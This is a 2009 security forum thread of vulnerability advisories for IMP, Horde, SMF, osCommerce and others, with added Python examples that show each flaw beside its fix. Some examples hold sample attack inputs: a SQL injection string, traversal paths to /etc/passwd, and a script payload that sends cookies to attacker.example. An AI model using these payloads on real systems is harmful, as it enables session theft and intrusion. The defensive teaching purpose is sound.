Spyware, Viruses, & Security forum

VULNERABILITIES \ FIXES - January 28, 2009

IMP Cross-Site Scripting and Script Insertion Vulnerabilities


Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Patch


Software: IMP Webmail Client 4.x

Description:
Some vulnerabilities have been reported in IMP, which can be exploited by malicious people to conduct cross-site scripting or script insertion attacks.

Certain input passed to smime.php, pgp.php, and message.php is not properly sanitised before being used or returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerabilities are reported in versions prior to 4.2.2 and 4.3.3.

Solution:
Update to version 4.2.2 or 4.3.3.

Provided and/or discovered by:
The vendor credits Gunnar Wrobel.

Original Advisory:
http://lists.horde.org/archives/announce/2009/000484.html
http://lists.horde.org/archives/announce/2009/000485.html

CA Anti-Virus Engine Archive Files Detection Bypass

Release Date: 2009-01-28

Critical:
Not critical
Impact: Security Bypass

Where: From remote
Solution Status: Vendor Patch


Software: BrightStor ARCserve Backup 11.x
BrightStor ARCserve Backup 11.x (for Microsoft SQL Server)
BrightStor ARCserve Backup 11.x (for Open Files)
BrightStor ARCserve Backup 11.x (for Oracle)
BrightStor ARCserve Backup 11.x (for Windows)
BrightStor ARCserve Backup Client Agent 11.x
CA Anti-Spyware 2007
CA Anti-Spyware 2008
CA Anti-Spyware 8.x
CA Anti-Virus 2007 (8.x)
CA Anti-Virus 2008 (9.x)
CA Anti-Virus for the Enterprise 8.x
CA Anti-Virus Gateway 7.x
CA Anti-Virus SDK
CA ARCserve Backup 12.x
CA Common Services (CCS) 11.x
CA eTrust Intrusion Detection 4.x
CA Internet Security Suite 2007
CA Internet Security Suite Plus 2008
CA Protection Suites 2.x
CA Protection Suites 3.x
CA Threat Manager 8.x
CA Unicenter Network and Systems Management (NSM) 11.x
CA Unicenter Network and Systems Management (NSM) 3.x
eTrust EZ Antivirus 6.x
eTrust EZ Antivirus 7.x
eTrust Intrusion Detection 2.x
eTrust Intrusion Detection 3.x
eTrust Secure Content Manager (SCM)



Description:
Some weaknesses have been reported in various CA products, which can be exploited by malware to bypass the scanning functionality.

The weaknesses are caused due to errors in the handling of various archive file formats within the Arclib Archive Library ("arclib"), which can be exploited to bypass the anti-virus scanning functionality via specially crafted archive files.

Solution:
The vendor has released arclib version 7.3.0.15 in September 2008, which has been deployed via automatic updates (please see the vendor advisory for details).

Provided and/or discovered by:
The vendor credits Thierry Zoller and Sergio Alvarez of n.runs AG.

Original Advisory:
CA (CA20090126-01):
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197601

Domain Technologie Control Multiple SQL Injection Vulnerabil

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Manipulation of data

Where: From remote
Solution Status: Vendor Workaround


Software: Domain Technologie Control 0.x

Description:
Some vulnerabilities have been reported in Domain Technologie Control, which can be exploited by malicious users to conduct SQL injection attacks.

Input passed to the "familyname", "christname", "company_name", "phone", "fax", "addr1", "addr2", "addr3", "zipcode", "city", "state", and "vat_num" parameters in client/new_account.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Fixed in repository.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Freshmeat:
http://freshmeat.net/projects/dtc/?branch_id=22759&release_id=292973
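
As an added illustration, not DTC's own code, the following Python/sqlite3 snippet shows the string-building pattern the advisory describes beside its parameterised replacement. The `accounts` table and its `credit` column are a constructed stand-in for DTC's client schema (`credit` represents data the sign-up form is not meant to set); the injected `familyname` value closes the string literal and the VALUES list, supplies its own value for that column, and comments out the rest of the statement. With placeholders the same input is stored as a plain, if odd-looking, name.

```python
import sqlite3
from typing import Optional

# Constructed stand-in for a client sign-up table; NOT DTC's schema. The
# "credit" column represents data the sign-up form must not be able to set.
SCHEMA = """
CREATE TABLE accounts (
    id         INTEGER PRIMARY KEY,
    familyname TEXT    NOT NULL,
    city       TEXT    NOT NULL,
    credit     INTEGER NOT NULL DEFAULT 0
);
"""

# A value for the "familyname" field that closes the string literal and the
# VALUES list, supplies its own credit, and comments out the rest of the SQL.
INJECTED_FAMILYNAME = "Mallory', 'Nowhere', 9999) -- "


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def insert_unsafe(conn: sqlite3.Connection, familyname: str, city: str) -> str:
    """The vulnerable pattern: form values pasted into the SQL text.
    Returns the statement actually executed so the effect is visible."""
    sql = ("INSERT INTO accounts (familyname, city, credit) "
           "VALUES ('%s', '%s', 0)" % (familyname, city))
    conn.execute(sql)
    conn.commit()
    return sql


def insert_safe(conn: sqlite3.Connection, familyname: str, city: str) -> None:
    """Parameterised statement: the driver passes values separately from the
    SQL text, so quotes and comment markers inside them stay plain data."""
    conn.execute("INSERT INTO accounts (familyname, city, credit) VALUES (?, ?, 0)",
                 (familyname, city))
    conn.commit()


def credit_of(conn: sqlite3.Connection, familyname: str) -> Optional[int]:
    row = conn.execute("SELECT credit FROM accounts WHERE familyname = ?",
                       (familyname,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = new_db()
    print(insert_unsafe(db, INJECTED_FAMILYNAME, "Paris"))
    print("unsafe: credit of Mallory =", credit_of(db, "Mallory"))            # 9999
    db = new_db()
    insert_safe(db, INJECTED_FAMILYNAME, "Paris")
    print("safe: row named 'Mallory' exists?", credit_of(db, "Mallory") is not None)  # False
```

The fix is the same in PHP: bind every form field with prepared statements (mysqli or PDO) rather than escaping on a per-parameter basis, which is how twelve fields in one script end up missed.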

GraphicsMagick DIB and BMP Denial of Service Vulnerabilities

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: DoS

Where: From remote
Solution Status: Vendor Patch


Software: GraphicsMagick 1.x

Description:
Some vulnerabilities have been reported in GraphicsMagick, which can be exploited by malicious people to cause a DoS (Denial of Service).

Solution:
Update to version 1.3.5.

Provided and/or discovered by:
1) Reported in bug report by an anonymous person.
2) Reported by the vendor.

Original Advisory:
http://www.graphicsmagick.org/Changelog.html
http://sourceforge.net/tracker/index....36&group_id=73485&atid=537937

Horde / Horde Groupware Cross-Site Scripting and File Inclus

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Cross Site Scripting
Exposure of sensitive information

Where: From remote
Solution Status: Vendor Patch


Software: Horde Application Framework 3.x
Horde Groupware 1.x

Description:
Some vulnerabilities have been reported in Horde and Horde Groupware, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose potentially sensitive information.

Solution:
Update to Horde 3.2.4 or 3.3.3 and Horde Groupware 1.1.5.

Provided and/or discovered by:
The vendor credits Gunnar Wrobel.

Original Advisory:
Horde:
http://lists.horde.org/archives/announce/2009/000483.html
http://lists.horde.org/archives/announce/2009/000482.html

Horde Groupware:
http://lists.horde.org/archives/announce/2009/000486.html

Sun Java System Access Manager User Enumeration Weakness

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Not critical
Impact: Exposure of system information

Where: From remote
Solution Status: Vendor Patch


Software: Sun Java System Access Manager 6.x
Sun Java System Access Manager 7.x

Description:
A weakness has been reported in Sun Java System Access Manager, which can be exploited by malicious people to identify valid user accounts.

The weakness is caused due to an unspecified error in the login module, which can be exploited to determine the existence of valid usernames.

Solution:
Apply patches.

Provided and/or discovered by:
The vendor credits Marco Mella (http://www.aboutsecurity.net).

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-242026-1

Gazelle CMS "template" Local File Inclusion Vulnerability

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Exposure of system information
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: Gazelle CMS 1.x



Description:
fuzion has discovered a vulnerability in Gazelle CMS, which can be exploited by malicious people to disclose sensitive information.

Input passed to the "template" parameter in index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes.

Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is disabled.

This vulnerability is confirmed in version 1.0.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
fuzion

Original Advisory:
http://packetstorm.linuxsecurity.com/0901-exploits/gazelle-lfi.txt

Sun Solaris BIND "EVP_VerifyFinal()" and "DSA_do_verify()" S

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Spoofing

Where: From remote
Solution Status: Unpatched


OS: Sun Solaris 10
Sun Solaris 9

Description:
Sun has acknowledged a vulnerability in Sun Solaris, which can be exploited by malicious people to conduct spoofing attacks.

Solution:
The vendor recommends disabling the DSA algorithm in named.conf (see the vendor's advisory for details).

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-250846-1

Other References:
SA33404:
http://secunia.com/advisories/33404/

Simple Machines Forum "packages.xml" Cross-Site Scripting

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Unpatched


Software: Simple Machines Forum 1.x

Description:
Xianur0 has discovered a vulnerability in Simple Machines Forum, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input read from the "text" and "description" elements in a "packages.xml" file (e.g. when "action" is set to "packageget", "sa" is set to "browse", and "absolute" is set to the web address serving the malicious "packages.xml" file) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in an administrative user's browser session in the context of an affected site.

This vulnerability is confirmed in version 1.1.7. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Xianur0
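
Added example, not SMF code: because the package list is fetched from whatever host the "absolute" parameter names, its "text" and "description" elements are attacker-controlled input like any form field, and must be escaped before they reach the administrator's page. The packages.xml below is constructed (only the two element names come from the advisory; the surrounding layout and the package name are assumed), and the two render functions show the unescaped output the advisory describes beside the escaped one. The IMP and Horde cross-site scripting entries earlier in this digest have the same root cause, unescaped output, even though their inputs differ.

```python
import html
import xml.etree.ElementTree as ET

# Constructed packages.xml as a server named by the "absolute" parameter
# might return it. Only the "text" and "description" element names come
# from the advisory; the rest of the layout is assumed. Not SMF code.
# The payload markup is XML-escaped so the parser yields it as literal text.
MALICIOUS_PACKAGES_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<package-list>
  <package name="nice-theme.tgz">
    <text>Nice theme&lt;script&gt;new Image().src='https://attacker.example/?c='+document.cookie&lt;/script&gt;</text>
    <description>Installs in one click &lt;img src=x onerror=alert(document.domain)&gt;</description>
  </package>
</package-list>
"""


def parse_packages(xml_bytes: bytes) -> list:
    """Extract the fields the package browser displays. For untrusted XML in
    production, parse with defusedxml rather than ElementTree directly."""
    root = ET.fromstring(xml_bytes)
    return [
        {
            "name": pkg.get("name", ""),
            "text": pkg.findtext("text") or "",
            "description": pkg.findtext("description") or "",
        }
        for pkg in root.iter("package")
    ]


def render_unsafe(packages: list) -> str:
    """The flaw: remote strings dropped straight into the admin page."""
    return "".join(
        "<li><b>%s</b><br>%s</li>" % (p["text"], p["description"])
        for p in packages
    )


def render_safe(packages: list) -> str:
    """Escape at the point of output; the browser then shows the markup as text."""
    return "".join(
        "<li><b>%s</b><br>%s</li>" % (html.escape(p["text"]), html.escape(p["description"]))
        for p in packages
    )


if __name__ == "__main__":
    pkgs = parse_packages(MALICIOUS_PACKAGES_XML)
    print(render_unsafe(pkgs))
    print(render_safe(pkgs))
```

Escaping belongs in the template layer, not in the fetch code, so that a second consumer of the parsed list cannot reintroduce the problem.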

GameScript Cross-Site Scripting and SQL Injection

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Cross Site Scripting
Manipulation of data

Where: From remote
Solution Status: Unpatched


Software: GameScript 4.x

Description:
Encrypt3d.M!nd has reported some vulnerabilities in GameScript, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Encrypt3d.M!nd

Original Advisory:
http://milw0rm.com/exploits/7893

Sun Solaris "autofs" Kernel Module Denial of Service and Pri

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Privilege escalation
DoS

Where: Local system
Solution Status: Vendor Patch


OS: Sun Solaris 10
Sun Solaris 8
Sun Solaris 9

Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially to gain escalated privileges.

The vulnerability is caused due to an unspecified error in the "autofs" Kernel Module, which can be exploited to cause "autofs" mounts to break and potentially to execute arbitrary code as the "root" user.

Successful exploitation requires that "autofs" is enabled.

The vulnerability is reported in Solaris 8, 9, and 10 for both the SPARC and x86 platforms.

Solution:
Apply patches.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-249966-1

Sun Solaris Pseudo-Terminal Driver Denial of Service

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Not critical
Impact: DoS

Where: Local system
Solution Status: Vendor Patch


OS: Sun Solaris 10
Sun Solaris 8
Sun Solaris 9

Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

The vulnerability is caused due to a race condition in the Solaris pseudo-terminal driver (pty(7D)) module, which can be exploited to cause a system panic.

The vulnerability is reported in Solaris 8, 9, and 10 for both the SPARC and x86 platforms.

Solution:
Apply patches.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-249586-1

Sun Solaris "libike" Library Denial of Service

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: DoS

Where: From remote
Solution Status: Vendor Patch


OS: Sun Solaris 10
Sun Solaris 9

Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the "libike" library when processing IKE packets, which can be exploited to crash the "in.iked" daemon.

The vulnerability is reported in Sun Solaris 9 and 10 for both the SPARC and x86 platforms.

Solution:
Apply patches.

Provided and/or discovered by:
Reported by the vendor.

Changelog:
2009-01-28: Added CVE reference.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-247406-1

osCommerce Cross-Site Request Forgery Vulnerability

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Unpatched


Software: osCommerce 2.x

Description:
A vulnerability has been discovered in osCommerce, which can be exploited by malicious people to conduct cross-site request forgery attacks.

The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create additional administrator accounts by tricking an administrative user into visiting a malicious web site.

The vulnerability is confirmed in version 2.2 Release Candidate 2a. Other versions may also be affected.

Solution:
Do not visit untrusted sites while being logged in to the application.

Provided and/or discovered by:
Russ McRee, HolisticInfoSec
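
An added example, not osCommerce code, of the validity check the advisory says is missing: a per-session random secret that every state-changing form must echo back, so a request the administrator's browser was tricked into sending from another site is refused even though it carries a valid session cookie. The session, form and administrator list are in-memory stand-ins for the application's real state.

```python
import hmac
import secrets

# Constructed illustration, not osCommerce code. Session, form and the
# admin list are in-memory stand-ins for the real application's state.


def new_session(user: str = "admin") -> dict:
    """A logged-in session gets a random secret. It is not a cookie: it only
    ever appears inside pages this site renders, which other origins cannot
    read."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}


def render_admin_form(session: dict) -> dict:
    """What the legitimate page embeds in the "create administrator" form,
    normally as a hidden input alongside the username field."""
    return {"csrf_token": session["csrf_token"], "username": ""}


def create_admin(session: dict, form: dict, admins: list) -> str:
    """State-changing handler guarded by the token.

    A forged request from attacker.example carries the victim's session
    cookie, so `session` is valid, but the same-origin policy stops the
    attacker from reading the token out of our page, so `form` either
    lacks it or carries a guess. The constant-time compare avoids leaking
    the token byte by byte through timing.
    """
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session["csrf_token"].encode()):
        return "rejected: missing or invalid CSRF token"
    admins.append(form["username"])
    return "ok"


if __name__ == "__main__":
    session, admins = new_session(), []
    # The request the advisory describes: the admin's browser is made to
    # submit a form from a malicious site, which cannot include the token.
    forged = {"username": "mallory"}
    print(create_admin(session, forged, admins), admins)
    legit = render_admin_form(session)
    legit["username"] = "alice"
    print(create_admin(session, legit, admins), admins)
```

Two companion rules make the token effective: no state change on GET requests, and the token must not be exposed through any page an attacker can read cross-origin.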

Microsoft boasts 'out of box' IE8 clickjack protection

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Imperfect solution to perfect storm

By Dan Goodin in San Francisco

Analysis: Microsoft has beefed up its latest Internet Explorer browser with an "out of the box" feature that it says will protect users against a serious class of attacks that allows maliciously controlled websites to manipulate the links visitors click on.

The new measure, baked into Redmond's first release candidate for IE8, blocks so-called clickjacking attacks, a threat that security researchers warn plagues users of every major browser.

Once lured to a malicious address, a user may think she's clicking on a link that leads to Google - when in fact it takes her to a money transfer page, a banner ad that's part of a click-fraud scheme, or any other destination the attacker chooses. Because it exploits architectural flaws in the internet's core, clickjacking has proved an extremely vexing problem to fix.

More: http://www.theregister.co.uk/2009/01/27/internet_explorer_clickjacking_block/

Numerous security holes in OpenX ad server

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

28 January 2009

Security firm Secunia has reported a total of 22 hitherto unpatched vulnerabilities in the free OpenX ad server. The problems include cross-site scripting holes, cross-site request forgery as well as SQL injection holes, and a file inclusion hole. The latter can only be exploited via files that are stored locally, which reduces the risk of a successful attack. However, it can apparently also be exploited for directory traversal attacks to spy on a system's files. A suitable exploit has already appeared on Milw0rm independently of Secunia's report.

More: http://www.heise-online.co.uk/security/Numerous-security-holes-in-OpenX-ad-server--/news/112509

Windows Mobile Bluetooth vulnerability allows access to any files

28 January 2009

A directory traversal vulnerability in the Bluetooth OBEX-FTP server of Windows Mobile 6 allows attackers to access files outside of the permitted list. According to the report, using "../" or "..\\" as part of the path name is sufficient to traverse to other directories. An attacker could use the technique to copy files from a device, or to install their own software, such as a key logger or other spyware.

More: http://www.heise-online.co.uk/security/Windows-Mobile-Bluetooth-vulnerability-allows-access-to-any-files--/news/112510
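
An added example (not code from Gazelle CMS or from Windows Mobile's OBEX-FTP server) of the path confinement that both this entry and the Gazelle CMS "template" entry above lack. It rejects embedded NUL bytes (the URL-encoded "%00" that truncates a filename in older PHP include() calls once magic_quotes_gpc is off), treats "..\\" exactly like "../", resolves the result and refuses anything that lands outside the base directory, and finally applies a file-type allow-list. The base directory and file names are constructed, and the input is assumed to be already URL-decoded.

```python
import os
import posixpath
from typing import Optional

# Constructed example: a path-confinement check for a file-serving or
# template-including handler. It is not Gazelle CMS or Windows Mobile code.
# Inputs are assumed to be already URL-decoded (so "%00" arrives as "\x00").


def safe_join(base_dir: str, user_path: str,
              allowed_exts=(".tpl", ".html")) -> Optional[str]:
    """Return the absolute path for user_path inside base_dir, or None to refuse.

    1. Reject embedded NUL: in older PHP, include($p . ".php") with $p
       ending in "\x00" truncated the filename, which is why the Gazelle
       advisory needs magic_quotes_gpc off.
    2. Treat backslash as a separator, so "..\\" traverses exactly like
       "../" (the Windows Mobile report lists both forms).
    3. Resolve symlinks and "..", then require the result to stay under
       base_dir (commonpath, not a string prefix, so "/srv/templates2"
       does not pass as "/srv/templates").
    4. Allow only the expected file types; for a template include an
       allow-list of names is the primary control and containment is
       defence in depth.
    """
    if "\x00" in user_path:
        return None
    normalised = posixpath.normpath(user_path.replace("\\", "/")).lstrip("/")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, normalised))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    if not candidate.lower().endswith(allowed_exts):
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/templates"            # constructed base directory
    for p in ("default.tpl", "sub/page.html", "../../etc/passwd",
              "..\\..\\Windows\\system.ini", "../../etc/passwd\x00", "/etc/passwd"):
        print(repr(p), "->", safe_join(base, p))
```

The order matters: normalising separators before resolving means a mixed "..\\../" sequence cannot slip past a check that only knows one separator, and resolving before the containment test means symlinks inside the base directory cannot be used to point outside it.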

Asymmetric encryption for BlackBerry

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

28 January 2009

Darmstadt-based vendor Corisecio GmbH intends to dispel repeated concerns about the smartphone's security architecture with its Mobile PKI for BlackBerry devices. The product consists of a Certificate Authority (CA) which generates the keys and certificates required for communication, and a client that needs to be installed on the mobile device.

Once all the components are in place, any data synchronisation between the Exchange Server and the BlackBerry device will be AES encrypted. According to the vendor it is also possible to use other CAs, for example Microsoft's standard product.

More: http://www.heise-online.co.uk/security/Asymmetric-encryption-for-BlackBerry--/news/112514
